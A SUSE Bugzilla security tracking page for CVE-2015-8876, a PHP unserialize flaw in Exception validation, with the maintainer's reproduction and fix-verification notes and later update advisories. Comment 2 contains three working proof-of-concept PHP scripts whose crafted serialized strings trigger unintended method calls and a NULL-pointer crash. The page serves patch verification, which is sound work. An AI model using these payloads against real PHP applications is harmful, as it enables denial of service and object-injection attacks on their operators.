Bug 981049 - (CVE-2015-8876) VUL-0: CVE-2015-8876: php5, php53: Zend/zend_exceptions.c does not validate certain Exception objects
(CVE-2015-8876)
VUL-0: CVE-2015-8876: php5, php53: Zend/zend_exceptions.c does not validate c...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/169325/
CVSSv2:NVD:CVE-2015-8876:7.5:(AV:N/A...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2016-05-23 08:06 UTC by Alexander Bergmann
Modified: 2016-08-10 07:22 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Alexander Bergmann 2016-05-23 08:06:04 UTC
CVE-2015-8876

Original release date: 05/21/2016
Last revised: 05/21/2016
Source: US-CERT/NIST 

Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x
before 5.6.12 does not validate certain Exception objects, which allows remote
attackers to cause a denial of service (NULL pointer dereference and application
crash) or trigger unintended method execution via crafted serialized data.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8876
https://bugs.php.net/bug.php?id=70121
Comment 1 Swamp Workflow Management 2016-05-23 22:00:37 UTC
bugbot adjusting priority
Comment 2 Petr Gajdos 2016-05-24 11:03:45 UTC
Reproduced with 13.2 and 12.

Installed packages: php5

$ cat poc1.php
<?php

/*
$ php poc1.php
unexpected
*/

class Pwn {

	function __toString() {
		die("surprise\n");
	}

}

unserialize('O:12:"DateInterval":1:{s:4:"days";O:3:"Pwn":0:{}}');

?>
$

$ cat poc2.php
<?php

/*$ 
php poc2.php
surprise 1
surprise 1
surprise 1
surprise 2
*/

class Pwn {

	function __call($x,$y) {
		die("surprise 2\n");
	}

	function __get($x) {
		echo "surprise 1\n";
	}

}

unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:3:"Pwn":0:{}}}');

?>
$

$ cat poc3.php

<?php

/*
gdb$ r poc3.php
Starting program: /usr/bin/php5 d.php

PHP Notice:  Undefined property: stdClass::$message in poc3.php on line 1
PHP Notice:  Undefined property: stdClass::$file in poc3.php on line 1
PHP Notice:  Undefined property: stdClass::$line in poc3.php on line 1

Program received signal SIGSEGV, Segmentation fault.

0x00000000006f52c8 in zim_exception___toString (ht=<optimized out>, return_value=0x7ffff7fc34d8, return_value_ptr=<optimized out>, this_ptr=0x7ffff7fc2f28, return_value_used=<optimized out>) at /build/php5-LRe0pE/php5-5.6.11+dfsg/Zend/zend_exceptions.c:673
673			if (Z_TYPE_P(trace) != IS_STRING) {
gdb$ x/i $pc
=> 0x6f52c8 <zim_exception___toString+568>:	cmp    BYTE PTR [rax+0x14],0x6
gdb$ p $rax
$1 = 0x0

*/

unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:8:"stdClass":0:{}}}');

?>
$

BEFORE

$ php poc1.php     
surprise
$

$ php poc2.php
surprise 1
surprise 1
surprise 1
surprise 2
$

$ php poc3.php
PHP Notice:  Undefined property: stdClass::$message in /981049/poc3.php on line 22
PHP Notice:  Undefined property: stdClass::$file in /981049/poc3.php on line 22
PHP Notice:  Undefined property: stdClass::$line in /981049/poc3.php on line 22
Segmentation fault (core dumped)
$

AFTER

$ php poc1.php
surprise
$ php poc2.php
$ php poc3.php

$

You see that poc1.php still manifests the bug, but 

"First one is probably more a design issue than a flaw, by the way I'm quite positive that could be avoided or at least documented."

So I am not spending more time on this, upstream probably had not fixed it, too.

For 11sp3 and 11 seems not to be affected:

$ php poc1.php 
PHP Notice:  Object of class Pwn could not be converted to int in /981049/poc1.php on line 16

$ php poc2.php
PHP Notice:  Object of class Exception could not be converted to int in /981049/poc2.php on line 23
$ php poc3.php
PHP Notice:  Object of class Exception could not be converted to int in /981049/poc3.php on line 22

$
Comment 3 Bernhard Wiedemann 2016-05-24 13:00:35 UTC
This is an autogenerated message for OBS integration:
This bug (981049) was mentioned in
https://build.opensuse.org/request/show/397708 13.2 / php5
Comment 4 Petr Gajdos 2016-05-24 13:22:38 UTC
Packages submitted.
Comment 6 Bernhard Wiedemann 2016-06-01 12:00:59 UTC
This is an autogenerated message for OBS integration:
This bug (981049) was mentioned in
https://build.opensuse.org/request/show/399462 13.2 / php5
Comment 8 Swamp Workflow Management 2016-06-11 12:16:14 UTC
openSUSE-SU-2016:1553-1: An update that fixes 13 vulnerabilities is now available.

Category: security (important)
Bug References: 976775,980366,980373,980375,981049,981050,981061,982009,982010,982011,982012,982013,982162
CVE References: CVE-2013-7456,CVE-2015-4116,CVE-2015-8873,CVE-2015-8874,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-3074,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096,CVE-2016-5114
Sources used:
openSUSE 13.2 (src):    php5-5.6.1-66.1
Comment 9 Swamp Workflow Management 2016-06-20 14:08:53 UTC
SUSE-SU-2016:1633-1: An update that fixes 8 vulnerabilities is now available.

Category: security (moderate)
Bug References: 981049,981050,981061,982009,982010,982011,982012,982013
CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    imap-2007e_suse-19.1
SUSE Linux Enterprise Workstation Extension 12 (src):    imap-2007e_suse-19.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Software Development Kit 12 (src):    imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Module for Web Scripting 12 (src):    imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Desktop 12-SP1 (src):    imap-2007e_suse-19.1
SUSE Linux Enterprise Desktop 12 (src):    imap-2007e_suse-19.1
Comment 10 Swamp Workflow Management 2016-06-27 13:09:55 UTC
openSUSE-SU-2016:1688-1: An update that fixes 8 vulnerabilities is now available.

Category: security (moderate)
Bug References: 981049,981050,981061,982009,982010,982011,982012,982013
CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096
Sources used:
openSUSE Leap 42.1 (src):    imap-2007e_suse-22.1, php5-5.5.14-53.1
Comment 11 Marcus Meissner 2016-08-01 09:53:38 UTC
released